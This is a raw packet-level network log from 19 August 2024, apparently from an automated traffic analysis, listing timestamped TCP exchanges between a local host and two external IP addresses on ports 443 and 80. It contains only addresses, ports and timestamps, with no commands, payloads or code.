Aug 19, 2024 06:06:20.578721046 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:20.581507921 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.581523895 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.581578016 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:20.581585884 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.581620932 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:20.601332903 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.601352930 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.601401091 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:20.601424932 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.601460934 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:20.601803064 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.601819038 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.601850033 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:20.601859093 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.601880074 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:20.601902008 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:20.630714893 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.630733967 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.630776882 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:20.630800009 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.630815029 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:20.630842924 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:20.645615101 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.645631075 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.645670891 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:20.645678043 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.645708084 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:20.645724058 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:20.657382965 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.657399893 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.657439947 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:20.657445908 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.657484055 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:20.657502890 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:20.658504963 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.658523083 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.658572912 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:20.658580065 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.658624887 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:20.667515993 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.667536974 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.667587996 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:20.667594910 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.667643070 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:20.669959068 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.669980049 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.670031071 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:20.670037985 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.670078993 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:20.689945936 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.689961910 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.690026045 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:20.690048933 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.690090895 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:20.708611965 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.708627939 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.708693027 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:20.708705902 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.708766937 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:20.718789101 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.718807936 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.718867064 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:20.718875885 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.718926907 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:20.734368086 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.734386921 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.734446049 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:20.734472036 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.734513998 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:20.734513998 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:20.746206999 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.746222973 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.746288061 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:20.746298075 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.746340036 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:20.747056961 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.747071981 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.747122049 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:20.747128010 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.747153044 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:20.747175932 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:20.756217003 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.756232023 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.756289005 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:20.756295919 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.756334066 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:20.778439999 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.778455973 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.778503895 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:20.778512955 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.778543949 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:20.778563023 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:20.779520035 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.779535055 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.779572010 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:20.779578924 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.779607058 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:20.779625893 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:20.797472954 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.797488928 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.797539949 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:20.797548056 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.797589064 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:20.807678938 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.807694912 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.807735920 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:20.807760000 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.807774067 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:20.807804108 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:20.823542118 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.823558092 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.823606968 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:20.823616028 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.823649883 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:20.823668957 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:20.835423946 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.835438967 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.835493088 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:20.835501909 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.835555077 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:20.835870981 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.835885048 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.835928917 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:20.835937023 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.835971117 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:20.845138073 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.845158100 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.845206022 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:20.845221996 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.845246077 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:20.845264912 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:20.867428064 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.867449999 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.867496967 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:20.867503881 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.867537975 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:20.867556095 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:20.868345022 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.868360996 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.868397951 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:20.868403912 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.868432045 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:20.868451118 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:20.886461973 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.886480093 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.886528015 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:20.886539936 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.886570930 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:20.886589050 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:20.896671057 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.896687984 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.896724939 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:20.896735907 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.896763086 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:20.896780968 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:20.912367105 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.912384033 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.912439108 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:20.912450075 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.912487030 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:20.924263954 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.924280882 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.924313068 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:20.924340963 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:20.924348116 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.924391031 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:20.925060034 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.925074100 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.925116062 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:20.925121069 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.925148964 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:20.925167084 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:20.934077978 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.934092999 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.934137106 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:20.934144020 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.934176922 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:20.934195995 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:20.956501007 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.956517935 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.956583977 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:20.956598997 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.956656933 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:20.957232952 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.957248926 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.957293987 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:20.957300901 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.957329988 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:20.957350016 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:20.975286007 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.975306988 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.975352049 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:20.975358009 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.975406885 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:20.985383987 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.985400915 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.985455036 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:20.985464096 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.985500097 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:21.001233101 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:21.001250029 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:21.001295090 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:21.001302958 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:21.001351118 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:21.013106108 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:21.013128996 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:21.013191938 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:21.013207912 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:21.013251066 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:21.013267040 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:21.013870001 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:21.013895035 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:21.013950109 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:21.013957977 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:21.013998985 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:21.025368929 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:21.025388002 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:21.025449038 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:21.025456905 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:21.025495052 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:21.045272112 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:21.045289040 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:21.045351028 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:21.045361042 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:21.045404911 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:21.046335936 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:21.046351910 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:21.046417952 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:21.046423912 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:21.046464920 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:21.064384937 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:21.064404964 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:21.064457893 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:21.064466000 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:21.064541101 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:21.074393988 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:21.074409962 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:21.074471951 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:21.074481964 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:21.074534893 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:21.090277910 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:21.090295076 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:21.090357065 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:21.090368986 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:21.090415001 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:21.101875067 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:21.101891994 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:21.102060080 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:21.102066994 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:21.102595091 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:21.102885962 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:21.102901936 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:21.103027105 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:21.103033066 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:21.103177071 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:21.114208937 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:21.114223957 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:21.114465952 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:21.114479065 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:21.114583015 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:21.134516001 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:21.134536028 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:21.134654999 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:21.134665966 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:21.134797096 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:21.135433912 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:21.135448933 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:21.135534048 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:21.135534048 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:21.135541916 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:21.135700941 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:21.153652906 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:21.153669119 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:21.153808117 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:21.153820038 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:21.153987885 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:21.163178921 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:21.163194895 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:21.163352966 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:21.163367987 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:21.167939901 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:21.179377079 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:21.179400921 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:21.179565907 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:21.179575920 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:21.183813095 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:21.190814972 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:21.190835953 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:21.190984964 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:21.190994978 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:21.191142082 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:21.191785097 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:21.191800117 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:21.191910982 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:21.191917896 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:21.192096949 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:21.203032017 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:21.203048944 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:21.203351974 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:21.203361988 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:21.207673073 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:21.223623991 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:21.223642111 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:21.224091053 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:21.224124908 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:21.224139929 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:21.224168062 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:21.224184036 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:21.224195957 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:21.224355936 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:21.242270947 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:21.242286921 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:21.242438078 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:21.242455959 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:21.242501974 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:21.252116919 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:21.252131939 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:21.252959013 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:21.252968073 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:21.256535053 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:21.268219948 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:21.268271923 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:21.268299103 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:21.268316031 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:21.268352032 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:21.268352032 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:21.269766092 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:21.269783974 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:21.323568106 CEST	80	49893	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:21.323681116 CEST	49893	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:21.437628984 CEST	49893	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:21.437973022 CEST	49894	80	192.168.2.4	185.215.113.16
